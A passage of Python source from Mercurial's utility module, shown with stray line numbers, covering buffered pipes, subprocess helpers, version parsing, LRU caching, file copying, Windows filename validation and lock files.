# closing inherited file descriptors at spawn time is only desired on POSIX
closefds = pycompat.osname == 'posix'

# default read size for bufferedinputpipe below
_chunksize = 4096
306
306
class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class let us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """

    def __init__(self, input):
        self._input = input
        self._buffer = []    # list of buffered chunks, oldest first
        self._eof = False    # set once os.read() returns empty
        self._lenbuf = 0     # total number of buffered bytes

    @property
    def hasbuffer(self):
        """True is any data is currently buffered

        This will be used externally a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        # delegate to the wrapped file object
        return self._input.closed

    def fileno(self):
        # expose the underlying descriptor so callers can select()/poll() it
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        # pull chunks until we hold at least 'size' bytes or reach EOF
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def readline(self, *args, **kwargs):
        if 1 < len(self._buffer):
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            self._buffer = [''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        # lfi: index of the newline within the newest chunk, -1 while absent
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find('\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                lfi = self._buffer[-1].find('\n')
        size = lfi + 1
        if lfi < 0: # end of file
            size = self._lenbuf
        elif 1 < len(self._buffer):
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return ''
        buf = self._buffer[0]
        if 1 < len(self._buffer):
            # collapse all chunks into one before slicing
            buf = ''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data):]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self):
        """read data to the buffer"""
        # read straight from the fd so select()-style polling stays accurate
        data = os.read(self._input.fileno(), _chunksize)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)
400
400
def popen2(cmd, env=None, newlines=False):
    """Spawn ``cmd`` through the shell; return its (stdin, stdout) pipes."""
    # Setting bufsize to -1 lets the system decide the buffer size.
    # The default for bufsize is 0, meaning unbuffered. This leads to
    # poor performance on Mac OS X: http://bugs.python.org/issue4194
    proc = subprocess.Popen(cmd,
                            shell=True,
                            bufsize=-1,
                            close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout
411
411
def popen3(cmd, env=None, newlines=False):
    """Like popen4(), but drop the Popen object from the result."""
    stdin, stdout, stderr, _proc = popen4(cmd, env, newlines)
    return stdin, stdout, stderr
415
415
def popen4(cmd, env=None, newlines=False, bufsize=-1):
    """Spawn ``cmd`` via the shell with all three stdio streams piped.

    Returns (stdin, stdout, stderr, Popen object).
    """
    proc = subprocess.Popen(cmd,
                            shell=True,
                            bufsize=bufsize,
                            close_fds=closefds,
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            universal_newlines=newlines,
                            env=env)
    return proc.stdin, proc.stdout, proc.stderr, proc
424
424
def version():
    """Return version information if available."""
    try:
        from . import __version__
    except ImportError:
        # running from a source tree without a generated version module
        return 'unknown'
    return __version__.version
432
432
def versiontuple(v=None, n=4):
    """Parses a Mercurial version string into an N-tuple.

    The version string to be parsed is specified with the ``v`` argument.
    If it isn't defined, the current Mercurial version string will be parsed.

    ``n`` can be 2, 3, or 4. Here is how some version strings map to
    returned values:

    >>> v = '3.6.1+190-df9b73d2d444'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, 1)
    >>> versiontuple(v, 4)
    (3, 6, 1, '190-df9b73d2d444')

    >>> versiontuple('3.6.1+190-df9b73d2d444+20151118')
    (3, 6, 1, '190-df9b73d2d444+20151118')

    >>> v = '3.6'
    >>> versiontuple(v, 2)
    (3, 6)
    >>> versiontuple(v, 3)
    (3, 6, None)
    >>> versiontuple(v, 4)
    (3, 6, None, None)

    >>> v = '3.9-rc'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc')

    >>> v = '3.9-rc+2-02a8fea4289b'
    >>> versiontuple(v, 2)
    (3, 9)
    >>> versiontuple(v, 3)
    (3, 9, None)
    >>> versiontuple(v, 4)
    (3, 9, None, 'rc+2-02a8fea4289b')
    """
    if not v:
        v = version()
    # split the numeric "X.Y.Z" part from the "+build" / "-rc" suffix.
    # fix: use a raw string — '\+' in a plain literal is an invalid escape
    # (DeprecationWarning on modern Python, slated to become an error)
    parts = remod.split(r'[\+-]', v, 1)
    if len(parts) == 1:
        vparts, extra = parts[0], None
    else:
        vparts, extra = parts

    vints = []
    for i in vparts.split('.'):
        try:
            vints.append(int(i))
        except ValueError:
            # stop at the first non-numeric component (e.g. 'rc')
            break
    # (3, 6) -> (3, 6, None)
    while len(vints) < 3:
        vints.append(None)

    if n == 2:
        return (vints[0], vints[1])
    if n == 3:
        return (vints[0], vints[1], vints[2])
    if n == 4:
        return (vints[0], vints[1], vints[2], extra)
501
501
# used by parsedate; formats are tried in order until one matches
defaultdateformats = (
    '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
    '%Y-%m-%dT%H:%M',    #   without seconds
    '%Y-%m-%dT%H%M%S',   # another awful but legal variant without :
    '%Y-%m-%dT%H%M',     #   without seconds
    '%Y-%m-%d %H:%M:%S', # our common legal variant
    '%Y-%m-%d %H:%M',    #   without seconds
    '%Y-%m-%d %H%M%S',   # without :
    '%Y-%m-%d %H%M',     #   without seconds
    '%Y-%m-%d %I:%M:%S%p',
    # fix: a second copy of '%Y-%m-%d %H:%M' used to follow here; the
    # duplicate only caused a redundant strptime attempt and was removed
    '%Y-%m-%d %I:%M%p',
    '%Y-%m-%d',
    '%m-%d',
    '%m/%d',
    '%m/%d/%y',
    '%m/%d/%Y',
    '%a %b %d %H:%M:%S %Y',
    '%a %b %d %I:%M:%S%p %Y',
    '%a, %d %b %Y %H:%M:%S', #  GNU coreutils "/bin/date --rfc-2822"
    '%b %d %H:%M:%S %Y',
    '%b %d %I:%M:%S%p %Y',
    '%b %d %H:%M:%S',
    '%b %d %I:%M:%S%p',
    '%b %d %H:%M',
    '%b %d %I:%M%p',
    '%b %d %Y',
    '%b %d',
    '%H:%M:%S',
    '%I:%M:%S%p',
    '%H:%M',
    '%I:%M%p',
)

# additionally accepted when the caller opts into looser date matching
extendeddateformats = defaultdateformats + (
    "%Y",
    "%Y-%m",
    "%b",
    "%b %Y",
    )
543
543
def cachefunc(func):
    '''cache the result of function calls'''
    # XXX doesn't handle keywords args
    argcount = func.__code__.co_argcount
    if argcount == 0:
        # a one-element list doubles as the "already computed" flag
        memo = []
        def wrapper():
            if not memo:
                memo.append(func())
            return memo[0]
        return wrapper
    memo = {}
    if argcount == 1:
        # we gain a small amount of time because
        # we don't need to pack/unpack the list
        def wrapper(arg):
            if arg not in memo:
                memo[arg] = func(arg)
            return memo[arg]
    else:
        def wrapper(*args):
            if args not in memo:
                memo[args] = func(*args)
            return memo[args]

    return wrapper
569
569
class sortdict(collections.OrderedDict):
    '''a simple sorted dictionary

    >>> d1 = sortdict([('a', 0), ('b', 1)])
    >>> d2 = d1.copy()
    >>> d2
    sortdict([('a', 0), ('b', 1)])
    >>> d2.update([('a', 2)])
    >>> d2.keys() # should still be in last-set order
    ['b', 'a']
    '''

    def __setitem__(self, key, value):
        # drop any existing entry first so that re-setting a key moves
        # it to the end, giving last-set iteration order
        self.pop(key, None)
        super(sortdict, self).__setitem__(key, value)

    if pycompat.ispypy:
        # __setitem__() isn't called as of PyPy 5.8.0
        def update(self, src):
            if isinstance(src, dict):
                src = src.iteritems()
            for key, value in src:
                self[key] = value
594
594
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        try:
            yield
            tr.close()
        except error.InterventionRequired:
            # commit what we have so far so the user can resume later
            tr.close()
            raise
    finally:
        tr.release()
612
612
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    # slots keep per-node memory small; caches may hold many nodes
    __slots__ = (u'next', u'prev', u'key', u'value')

    def __init__(self):
        # neighbour links are populated by the owning lrucachedict
        self.next = None
        self.prev = None

        # _notset (module-level sentinel) marks a node that carries no
        # entry, so that None remains a usable key/value
        self.key = _notset
        self.value = None

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
631
631
class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.
    """
    def __init__(self, max):
        # backing mapping: key -> _lrucachenode
        self._cache = {}

        # start with a single self-linked node; further nodes are
        # allocated lazily up to the capacity (see _addcapacity())
        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self._capacity = max

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        # raises KeyError for absent keys; a hit refreshes recency
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def __setitem__(self, k, v):
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            node.value = v
            self._movetohead(node)
            return

        if self._size < self._capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

            # At capacity. Kill the old entry.
            if node.key is not _notset:
                del self._cache[node.key]

        node.key = k
        node.value = v
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

    def __delitem__(self, k):
        node = self._cache.pop(k)
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

    # Additional dict methods.

    def get(self, k, default=None):
        # NOTE: unlike __getitem__, a hit via get() does not refresh
        # the entry's recency
        try:
            return self._cache[k].value
        except KeyError:
            return default

    def clear(self):
        # empty every populated node in place; the circular list (and
        # thus the allocated capacity) is retained for reuse
        n = self._head
        while n.key is not _notset:
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self):
        result = lrucachedict(self._capacity)
        n = self._head.prev
        # Iterate in oldest-to-newest order, so the copy has the right ordering
        for i in range(len(self._cache)):
            result[n.key] = n.value
            n = n.prev
        return result

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node
790
790
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    maxsize = 20
    if func.__code__.co_argcount == 1:
        # one-argument fast path: key directly on the argument
        def f(arg):
            if arg in cache:
                # cache hit: refresh recency
                order.remove(arg)
            else:
                if len(cache) > maxsize:
                    # evict the least recently used entry
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args in cache:
                order.remove(args)
            else:
                if len(cache) > maxsize:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            order.append(args)
            return cache[args]

    return f
817
817
class propertycache(object):
    """Descriptor turning a method into a lazily computed attribute.

    The first access calls the wrapped function and stores the result
    via cachevalue(); since this is a non-data descriptor, later reads
    hit the instance __dict__ directly and skip the descriptor.
    """
    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        value = self.func(obj)
        self.cachevalue(obj, value)
        # return the computed value, not a re-read of obj.__dict__:
        # subclasses may override cachevalue() to store elsewhere
        return value

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value
830
830
def pipefilter(s, cmd):
    '''filter string S through command CMD, returning its output'''
    proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                            stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    # communicate() feeds s on stdin, closes it, and collects stdout
    out = proc.communicate(s)[0]
    return out
837
837
def tempfilter(s, cmd):
    '''filter string S through a pair of temporary files with CMD.
    CMD is used as a template to create the real command to be run,
    with the strings INFILE and OUTFILE replaced by the real names of
    the temporary files generated.'''
    inname, outname = None, None
    try:
        infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
        fp = os.fdopen(infd, pycompat.sysstr('wb'))
        fp.write(s)
        fp.close()
        outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
        # only the name is needed here; the command itself writes OUTFILE
        os.close(outfd)
        cmd = cmd.replace('INFILE', inname)
        cmd = cmd.replace('OUTFILE', outname)
        code = os.system(cmd)
        if pycompat.sysplatform == 'OpenVMS' and code & 1:
            # on OpenVMS an odd exit status means success
            code = 0
        if code:
            raise Abort(_("command '%s' failed: %s") %
                        (cmd, explainexit(code)))
        return readfile(outname)
    finally:
        # best-effort removal of whichever temp files were created
        try:
            if inname:
                os.unlink(inname)
        except OSError:
            pass
        try:
            if outname:
                os.unlink(outname)
        except OSError:
            pass
871
871
# maps a command-string prefix to the filter implementation handling it;
# filter() below falls back to pipefilter for commands with no known prefix
filtertable = {
    'tempfile:': tempfilter,
    'pipe:': pipefilter,
    }
876
876
def filter(s, cmd):
    "filter a string through a command that transforms its input to its output"
    for prefix, impl in filtertable.iteritems():
        if not cmd.startswith(prefix):
            continue
        # strip the dispatch prefix before handing over the command
        return impl(s, cmd[len(prefix):].lstrip())
    # no recognized prefix: treat the whole command as a shell pipe
    return pipefilter(s, cmd)
883
883
def binary(s):
    """return true if a string is binary data"""
    # heuristic: an embedded NUL byte marks binary content; the empty
    # string is explicitly not binary
    if not s:
        return False
    return '\0' in s
887
887
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        # position of the highest set bit, or 0 for x == 0
        if not x:
            return 0
        bits = 0
        while x:
            x >>= 1
            bits += 1
        return bits - 1

    pending = []
    size = 0
    for piece in source:
        pending.append(piece)
        size += len(piece)
        if size < min:
            continue
        if min < max:
            # grow the threshold: at least double it, and jump straight
            # to the magnitude of what we just buffered if that is larger
            min = min << 1
            nmin = 1 << log2(size)
            if nmin > min:
                min = nmin
            if min > max:
                min = max
        yield ''.join(pending)
        pending = []
        size = 0
    if pending:
        # emit whatever is left, even if below the threshold
        yield ''.join(pending)
918
918
# re-exported convenience alias for error.Abort
Abort = error.Abort
920
920
def always(fn):
    """constant predicate: return True regardless of the argument"""
    return True
923
923
def never(fn):
    """constant predicate: return False regardless of the argument"""
    return False
926
926
def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue have been fixed in 2.7.
    """
    if sys.version_info >= (2, 7):
        # modern interpreters don't need the workaround
        return func

    def wrapper(*args, **kwargs):
        wasenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            # only re-enable collection if the caller had it on
            if wasenabled:
                gc.enable()
    return wrapper
950
950
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            # different drives (Windows): no relative path exists,
            # fall back to an absolute one
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    fromparts, toparts = splitpath(n1), n2.split('/')
    fromparts.reverse()
    toparts.reverse()
    # strip the common prefix (compared from the reversed tails)
    while fromparts and toparts and fromparts[-1] == toparts[-1]:
        fromparts.pop()
        toparts.pop()
    toparts.reverse()
    # go up once for every component unique to n1, then descend into n2
    return pycompat.ossep.join((['..'] * len(fromparts)) + toparts) or '.'
976
976
def mainfrozen():
    """return True if we are a frozen executable.

    The code supports py2exe (most common, Windows only) and tools/freeze
    (portable, not much used).
    """
    if safehasattr(sys, "frozen"):  # new py2exe
        return True
    if safehasattr(sys, "importers"):  # old py2exe
        return True
    return imp.is_frozen(u"__main__")  # tools/freeze
986
986
# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

# cached path of the 'hg' executable; populated lazily by
# hgexecutable() via _sethgexecutable()
_hgexecutable = None
997
997
def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.
    """
    if _hgexecutable is None:
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[pycompat.sysstr('__main__')]
        if hg:
            # explicit override via the HG environment variable
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            # __main__ is an 'hg' script (e.g. running from a checkout)
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            # fall back to searching PATH, then to argv[0]
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable
1021
1021
def _sethgexecutable(path):
    """set location of the 'hg' executable"""
    # cached for later hgexecutable() calls; also ends up in the HG
    # environment variable handed to children (see shellenviron())
    global _hgexecutable
    _hgexecutable = path
1026
1026
1027 def _isstdout(f):
1027 def _isstdout(f):
1028 fileno = getattr(f, 'fileno', None)
1028 fileno = getattr(f, 'fileno', None)
1029 return fileno and fileno() == sys.__stdout__.fileno()
1029 return fileno and fileno() == sys.__stdout__.fileno()
1030
1030
def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out"""
    def py2shell(val):
        'convert python object into string that is useful to shell'
        # booleans and None become shell-friendly 0/1 flags
        if val is True:
            return '1'
        if val is None or val is False:
            return '0'
        return str(val)

    env = dict(encoding.environ)
    if environ:
        for key, val in environ.iteritems():
            env[key] = py2shell(val)
    # always tell children where 'hg' lives
    env['HG'] = hgexecutable()
    return env
1045
1045
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.'''
    try:
        # flush our own pending output before the child writes any
        stdout.flush()
    except Exception:
        # best-effort: stdout may be closed or broken
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is None or _isstdout(out):
        # let the child inherit our stdout/stderr directly
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        # capture combined stdout+stderr and copy it line by line into
        # the caller-supplied file-like object
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        for line in iter(proc.stdout.readline, ''):
            out.write(line)
        proc.wait()
        rc = proc.returncode
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        # on OpenVMS an odd exit status means success
        rc = 0
    return rc
1072
1072
def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            tb = sys.exc_info()[2]
            # a traceback depth of one means the TypeError came from the
            # call itself (bad arguments), not from inside func
            if len(traceback.extract_tb(tb)) != 1:
                raise
            raise error.SignatureError

    return check
1084
1084
# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}
1099
1099
def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            # remember the old stat so we can detect mtime ambiguity below
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        # re-create the symlink rather than copying its target
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one
                    advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
                    os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise Abort(str(inst))
1151
1151
def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    def gettopic():
        # progress topic depends on which copy strategy ended up being used
        return _('linking') if hardlink else _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            # only attempt hardlinking when source and destination share
            # a device; cross-device links are impossible anyway
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            def nprog(t, pos):
                # shift the nested call's progress by what we already did
                if pos is not None:
                    return progress(t, pos + num)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        topic = gettopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                # hardlinking failed once; stop trying for the rest of
                # the tree and fall back to plain copies
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        progress(topic, num)
        progress(topic, None)

    return hardlink, num
1191
1191
# Names that Windows reserves for devices (with any extension) and
# characters that may not appear in filenames; consumed by
# checkwinfilename() below.  Kept as bytes for py2/py3 filename handling.
_winreservednames = (b'con prn aux nul '
                     b'com1 com2 com3 com4 com5 com6 com7 com8 com9 '
                     b'lpt1 lpt2 lpt3 lpt4 lpt5 lpt6 lpt7 lpt8 lpt9').split()
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename("just/a/normal/path")
    >>> checkwinfilename("foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename("foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename("foo/bar/xml.con")
    >>> checkwinfilename("foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename("foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename("foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename("foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename("../bar")
    >>> checkwinfilename("foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename("foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    # examine each path component separately
    for component in path.replace('\\', '/').split('/'):
        if not component:
            continue
        for c in _filenamebytestr(component):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains %r, which is invalid "
                         "on Windows") % c
        # the part before the first dot is what Windows matches against
        # device names, regardless of extension
        base = component.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        last = component[-1]
        # substring test deliberately lets '.' and '..' through
        if last in '. ' and component not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % last
1242
1242
# pick the platform-appropriate filename checker and wall-clock timer
if pycompat.osname == 'nt':
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    # prefer the high-resolution counter where the interpreter has one
    timer = time.perf_counter
1252
1252
def makelock(info, pathname):
    """Create a lock at pathname whose content is info.

    A symlink is used where the platform supports it (the lock content is
    the link target); otherwise an exclusively-created regular file is
    written.  Raises OSError(EEXIST) if the lock already exists.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
        # other symlink failures: fall through to the file-based lock
    except AttributeError: # no symlink in os
        pass

    ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
    os.write(ld, info)
    os.close(ld)
1265
1265
def readlock(pathname):
    """Return the content of the lock at pathname.

    Reads the symlink target when the lock is a symlink, otherwise the
    content of the regular lock file (see makelock for both formats).
    """
    try:
        return os.readlink(pathname)
    except OSError as why:
        # EINVAL: not a symlink; ENOSYS: symlinks unsupported here
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    fp = posixfile(pathname)
    r = fp.read()
    fp.close()
    return r
1278
1278
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        # no fileno(); fall back to stat'ing by the file's name
        return os.stat(fp.name)
1285
1285
1286 # File system features
1286 # File system features
1287
1287
def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    st1 = os.lstat(path)
    parent, base = os.path.split(path)
    # build a case-flipped sibling name to probe with
    flipped = base.upper()
    if flipped == base:
        flipped = base.lower()
    if flipped == base:
        return True # no evidence against case sensitivity
    probe = os.path.join(parent, flipped)
    try:
        st2 = os.lstat(probe)
    except OSError:
        # flipped name doesn't resolve: the fs distinguishes case
        return True
    # identical stat means both names hit the same file: case-insensitive
    return st2 != st1
1310
1310
# Probe for Google's re2 bindings.  _re2 is tri-state: None means
# "imported but not yet validated", False means unavailable; the real
# check happens lazily in _re._checkre2().
try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False
1316
1316
class _re(object):
    """Facade over the stdlib re module that transparently uses re2."""

    def _checkre2(self):
        global _re2
        try:
            # make sure matching actually works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            # re2 takes inline flags instead of a flags argument
            if flags & remod.IGNORECASE:
